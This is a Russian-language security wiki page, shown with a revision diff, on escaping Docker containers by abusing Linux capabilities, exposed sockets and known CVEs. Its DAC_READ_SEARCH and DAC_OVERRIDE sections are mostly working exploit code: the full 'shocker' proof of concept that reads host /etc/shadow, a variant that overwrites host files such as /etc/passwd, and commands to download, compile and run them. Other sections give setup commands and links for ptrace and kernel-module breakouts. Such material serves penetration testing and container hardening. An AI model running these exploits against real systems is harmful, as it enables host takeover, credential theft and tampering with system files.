Docker escape — различия между версиями

Материал из InformationSecurity WIKI
Перейти к: навигация, поиск
м (Local file reading)
м (CAP_NET_RAW)
Строка 500: Строка 500:
  
 
Скорее всего применимо только для MITM-атак, в следствие которых возможно повышение привилегий на других серверах.
 
Скорее всего применимо только для MITM-атак, в следствие которых возможно повышение привилегий на других серверах.
 +
 +
Требуется проброшенный интерфейс хостовой машины, иначе атаки придется проводить на NAT докер контейнеров.
  
 
=== CAP_NET_ADMIN ===
 
=== CAP_NET_ADMIN ===

Версия 16:46, 11 марта 2022


Статья посвящена повышению привилегий из докер-контейнера в зависимости от предоставленного доступа.


SSRF

Доступ, когда можно только делать запросы по различным протоколам.

Суть в том, что в случае с SSRF можно делать запросы кроме файлов еще и на сторонние сервисы. Эти сервисы как правило запущены не в том же контейнере, а на соседнем с виртуальной сетью (это быстро настраивается с docker-compose).

Это повышение привелегий горизонтальное, но позволяет перейти на другой контейнер

Local file reading

Доступ, когда можно только читать локальные файлы контейнера.

Remote code execution

Capabilities

Получить список возможных capabilities:

1 capsh --print


Описание capabilities

Или сложнее:

1 cat /proc/self/status | grep Cap

Пример вывода:

1 CapInh: 0000000000000000
2 CapPrm: 0000003fffffffff
3 CapEff: 0000003fffffffff
4 CapBnd: 0000003fffffffff
5 CapAmb: 0000000000000000

Чтобы декодировать:

1 capsh --decode=0000003fffffffff
2 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37

Тестовая инфраструктура для произвольной capability:

1 sudo docker run --cap-add название_capability -it ubuntu /bin/bash
2 apt update
3 apt-get install libcap2-bin gdb
4 capsh --print

CAP_SYS_ADMIN

Эта capability позволяет получить максимальные права. В своем роде alias на другие.

Позволяет зарегистрировать usermode-приложение которое запустится в контексте ядра.


CAP_SYS_PTRACE + host pid

Эксплуатация возможна только, если есть параметр --pid=host при запуске контейнера (позволяет работать с хостовыми процессами).

Тестовая инфраструктура:

1 sudo docker run --cap-add CAP_SYS_PTRACE --pid=host -it ubuntu /bin/bash
2 apt update
3 apt-get install libcap2-bin gdb
4 capsh --print


Далее по инструкции тут https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc

Кратко: 1. Ищем нужный хостовой процесс (скорее всего рутовый) 2. Запускаем gdb -p PID 3. Встраиваем инструкции (шеллкод) 4. Запускаем инструкции

CAP_SYS_MODULE

Позволяет модифицировать ядро.

Тестовая инфраструктура:

1 sudo docker run --cap-add CAP_SYS_MODULE -it ubuntu /bin/bash
2 apt update
3 apt-get install libcap2-bin gdb
4 capsh --print


Инструкция по написанию модуля ядра https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd

DAC_READ_SEARCH

Позволяет прочитать содержимое файлов хостовой системы.

Тестовая инфраструктура:

1 sudo docker run --cap-add DAC_READ_SEARCH -it ubuntu /bin/bash
2 apt update
3 apt-get install libcap2-bin gdb
4 capsh --print

Инструкция по эксплуатации https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities#cap_dac_read_search


Чтение хостового файла

 1 cd /tmp
 2 apt update
 3 apt install gcc wget nano
 4 wget http://stealth.openwall.net/xSports/shocker.c
 5 
 6 # Получаете список mount и ищите файлы, которы примонтированы из хостовой системы. Как правило это .dockerinit, /etc/resolv.conf, /etc/hosts, /etc/hostname .
 7 mount 
 8 
 9 
10 # заменяете в файле shocker.c путь .dockerinit на найденный вами путь
11 # и заменяем /etc/shadow на файл который хотите прочитать
12 nano shocker.c
13 
14 # компиляция
15 gcc shocker.c
16 
17 # чтение файла
18 ./a.out

Содержимое файла shocker.c:

  1 /* shocker: docker PoC VMM-container breakout (C) 2014 Sebastian Krahmer
  2  *
  3  * Demonstrates that any given docker image someone is asking
  4  * you to run in your docker setup can access ANY file on your host,
  5  * e.g. dumping hosts /etc/shadow or other sensitive info, compromising
  6  * security of the host and any other docker VM's on it.
  7  *
  8  * docker using container based VMM: Sebarate pid and net namespace,
  9  * stripped caps and RO bind mounts into container's /. However
 10  * as its only a bind-mount the fs struct from the task is shared
 11  * with the host which allows to open files by file handles
 12  * (open_by_handle_at()). As we thankfully have dac_override and
 13  * dac_read_search we can do this. The handle is usually a 64bit
 14  * string with 32bit inodenumber inside (tested with ext4).
 15  * Inode of / is always 2, so we have a starting point to walk
 16  * the FS path and brute force the remaining 32bit until we find the
 17  * desired file (It's probably easier, depending on the fhandle export
 18  * function used for the FS in question: it could be a parent inode# or
 19  * the inode generation which can be obtained via an ioctl).
 20  * [In practise the remaining 32bit are all 0 :]
 21  *
 22  * tested with docker 0.11 busybox demo image on a 3.11 kernel:
 23  *
 24  * docker run -i busybox sh
 25  *
 26  * seems to run any program inside VMM with UID 0 (some caps stripped); if
 27  * user argument is given, the provided docker image still
 28  * could contain +s binaries, just as demo busybox image does.
 29  *
 30  * PS: You should also seccomp kexec() syscall :)
 31  * PPS: Might affect other container based compartments too
 32  *
 33  * $ cc -Wall -std=c99 -O2 shocker.c -static
 34  */
 35 
 36 #define _GNU_SOURCE
 37 #include <stdio.h>
 38 #include <sys/types.h>
 39 #include <sys/stat.h>
 40 #include <fcntl.h>
 41 #include <errno.h>
 42 #include <stdlib.h>
 43 #include <string.h>
 44 #include <unistd.h>
 45 #include <dirent.h>
 46 #include <stdint.h>
 47 
 48 
 49 struct my_file_handle {
 50 	unsigned int handle_bytes;
 51 	int handle_type;
 52 	unsigned char f_handle[8];
 53 };
 54 
 55 
 56 
 57 void die(const char *msg)
 58 {
 59 	perror(msg);
 60 	exit(errno);
 61 }
 62 
 63 
 64 void dump_handle(const struct my_file_handle *h)
 65 {
 66 	fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
 67 	        h->handle_type);
 68 	for (int i = 0; i < h->handle_bytes; ++i) {
 69 		fprintf(stderr,"0x%02x", h->f_handle[i]);
 70 		if ((i + 1) % 20 == 0)
 71 			fprintf(stderr,"\n");
 72 		if (i < h->handle_bytes - 1)
 73 			fprintf(stderr,", ");
 74 	}
 75 	fprintf(stderr,"};\n");
 76 }
 77 
 78 
 79 int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
 80 {
 81 	int fd;
 82 	uint32_t ino = 0;
 83 	struct my_file_handle outh = {
 84 		.handle_bytes = 8,
 85 		.handle_type = 1
 86 	};
 87 	DIR *dir = NULL;
 88 	struct dirent *de = NULL;
 89 
 90 	path = strchr(path, '/');
 91 
 92 	// recursion stops if path has been resolved
 93 	if (!path) {
 94 		memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
 95 		oh->handle_type = 1;
 96 		oh->handle_bytes = 8;
 97 		return 1;
 98 	}
 99 	++path;
100 	fprintf(stderr, "[*] Resolving '%s'\n", path);
101 
102 	if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
103 		die("[-] open_by_handle_at");
104 
105 	if ((dir = fdopendir(fd)) == NULL)
106 		die("[-] fdopendir");
107 
108 	for (;;) {
109 		de = readdir(dir);
110 		if (!de)
111 			break;
112 		fprintf(stderr, "[*] Found %s\n", de->d_name);
113 		if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
114 			fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
115 			ino = de->d_ino;
116 			break;
117 		}
118 	}
119 
120 	fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
121 
122 
123 	if (de) {
124 		for (uint32_t i = 0; i < 0xffffffff; ++i) {
125 			outh.handle_bytes = 8;
126 			outh.handle_type = 1;
127 			memcpy(outh.f_handle, &ino, sizeof(ino));
128 			memcpy(outh.f_handle + 4, &i, sizeof(i));
129 
130 			if ((i % (1<<20)) == 0)
131 				fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
132 			if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
133 				closedir(dir);
134 				close(fd);
135 				dump_handle(&outh);
136 				return find_handle(bfd, path, &outh, oh);
137 			}
138 		}
139 	}
140 
141 	closedir(dir);
142 	close(fd);
143 	return 0;
144 }
145 
146 
147 int main()
148 {
149 	char buf[0x1000];
150 	int fd1, fd2;
151 	struct my_file_handle h;
152 	struct my_file_handle root_h = {
153 		.handle_bytes = 8,
154 		.handle_type = 1,
155 		.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
156 	};
157 
158 	fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014             [***]\n"
159 	       "[***] The tea from the 90's kicks your sekurity again.     [***]\n"
160 	       "[***] If you have pending sec consulting, I'll happily     [***]\n"
161 	       "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");
162 
163 	read(0, buf, 1);
164 
165 	// get a FS reference from something mounted in from outside
166 	if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
167 		die("[-] open");
168 
169 	if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
170 		die("[-] Cannot find valid handle!");
171 
172 	fprintf(stderr, "[!] Got a final handle!\n");
173 	dump_handle(&h);
174 
175 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
176 		die("[-] open_by_handle");
177 
178 	memset(buf, 0, sizeof(buf));
179 	if (read(fd2, buf, sizeof(buf) - 1) < 0)
180 		die("[-] read");
181 
182 	fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
183 
184 	close(fd2); close(fd1);
185 
186 	return 0;
187 }


DAC_OVERRIDE

Позволяет прочитать содержимое файлов хостовой системы.

Тестовая инфраструктура:

1 sudo docker run --cap-add DAC_OVERRIDE -it ubuntu /bin/bash
2 apt update
3 apt-get install libcap2-bin gdb
4 capsh --print

Запись хостового файла

Инструкция альтернативная DAC_READ_SEARCH, но запускать надо так ./a.out <путь_хостового_файла> <путь_докер_файла>

Хостовой файл будет перезаписан докер-файлом.

  1 #include <stdio.h>
  2 #include <sys/types.h>
  3 #include <sys/stat.h>
  4 #include <fcntl.h>
  5 #include <errno.h>
  6 #include <stdlib.h>
  7 #include <string.h>
  8 #include <unistd.h>
  9 #include <dirent.h>
 10 #include <stdint.h>
 11 
 12 // gcc shocker_write.c -o shocker_write
 13 // ./shocker_write /etc/passwd passwd 
 14 
 15 struct my_file_handle {
 16   unsigned int handle_bytes;
 17   int handle_type;
 18   unsigned char f_handle[8];
 19 };
 20 void die(const char * msg) {
 21   perror(msg);
 22   exit(errno);
 23 }
 24 void dump_handle(const struct my_file_handle * h) {
 25   fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes,
 26     h -> handle_type);
 27   for (int i = 0; i < h -> handle_bytes; ++i) {
 28     fprintf(stderr, "0x%02x", h -> f_handle[i]);
 29     if ((i + 1) % 20 == 0)
 30       fprintf(stderr, "\n");
 31     if (i < h -> handle_bytes - 1)
 32       fprintf(stderr, ", ");
 33   }
 34   fprintf(stderr, "};\n");
 35 } 
 36 int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
 37 {
 38   int fd;
 39   uint32_t ino = 0;
 40   struct my_file_handle outh = {
 41     .handle_bytes = 8,
 42     .handle_type = 1
 43   };
 44   DIR * dir = NULL;
 45   struct dirent * de = NULL;
 46   path = strchr(path, '/');
 47   // recursion stops if path has been resolved
 48   if (!path) {
 49     memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle));
 50     oh -> handle_type = 1;
 51     oh -> handle_bytes = 8;
 52     return 1;
 53   }
 54   ++path;
 55   fprintf(stderr, "[*] Resolving '%s'\n", path);
 56   if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0)
 57     die("[-] open_by_handle_at");
 58   if ((dir = fdopendir(fd)) == NULL)
 59     die("[-] fdopendir");
 60   for (;;) {
 61     de = readdir(dir);
 62     if (!de)
 63       break;
 64     fprintf(stderr, "[*] Found %s\n", de -> d_name);
 65     if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) {
 66       fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino);
 67       ino = de -> d_ino;
 68       break;
 69     }
 70   }
 71   fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
 72   if (de) {
 73     for (uint32_t i = 0; i < 0xffffffff; ++i) {
 74       outh.handle_bytes = 8;
 75       outh.handle_type = 1;
 76       memcpy(outh.f_handle, & ino, sizeof(ino));
 77       memcpy(outh.f_handle + 4, & i, sizeof(i));
 78       if ((i % (1 << 20)) == 0)
 79         fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i);
 80       if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) {
 81         closedir(dir);
 82         close(fd);
 83         dump_handle( & outh);
 84         return find_handle(bfd, path, & outh, oh);
 85       }
 86     }
 87   }
 88   closedir(dir);
 89   close(fd);
 90   return 0;
 91 }
 92 int main(int argc, char * argv[]) {
 93   char buf[0x1000];
 94   int fd1, fd2;
 95   struct my_file_handle h;
 96   struct my_file_handle root_h = {
 97     .handle_bytes = 8,
 98     .handle_type = 1,
 99     .f_handle = {
100       0x02,
101       0,
102       0,
103       0,
104       0,
105       0,
106       0,
107       0
108     }
109   };
110   fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
111     "[***] The tea from the 90's kicks your sekurity again. [***]\n"
112     "[***] If you have pending sec consulting, I'll happily [***]\n"
113     "[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
114   read(0, buf, 1);
115   // get a FS reference from something mounted in from outside
116   if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
117     die("[-] open");
118   if (find_handle(fd1, argv[1], & root_h, & h) <= 0)
119     die("[-] Cannot find valid handle!");
120   fprintf(stderr, "[!] Got a final handle!\n");
121   dump_handle( & h);
122   if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0)
123     die("[-] open_by_handle");
124   char * line = NULL;
125   size_t len = 0;
126   FILE * fptr;
127   ssize_t read;
128   fptr = fopen(argv[2], "r");
129   while ((read = getline( & line, & len, fptr)) != -1) {
130     write(fd2, line, read);
131   }
132   printf("Success!!\n");
133   close(fd2);
134   close(fd1);
135   return 0;
136 }

CAP_SYS_RAWIO

CAP_SYSLOG

CAP_NET_RAW

Возможность отправлять низкоуровневые пакеты.

Скорее всего применимо только для MITM-атак, в следствие которых возможно повышение привилегий на других серверах.

Требуется проброшенный интерфейс хостовой машины, иначе атаки придется проводить на NAT докер контейнеров.

CAP_NET_ADMIN

CVE

Runc exploit (CVE-2019-5736)

Sockets

Docker Sockets

Суть в том, что при некорректной настройке docker socket может быть доступен из контейнера.

Это позволяет выполнять стандартные docker команды на хостовой системе.

1 find / -name docker.sock 2>/dev/null
2 # Как правило будет /run/docker.sock

Если docker.sock будет лежать по адресу /run/docker.sock то можно использовать стандартную команду docker.

Иначе потребуется использовать команду

1 docker -H unix:///path/to/docker.sock ...


rktlet socket

unix:///var/run/rktlet.sock


frakti socket

unix:///var/run/frakti.sock


cri-o socket

unix:///var/run/crio/crio.sock


containerd socket

unix:///run/containerd/containerd.sock


dockershim socket

unix:///var/run/dockershim.sock


Privileged container

Ссылки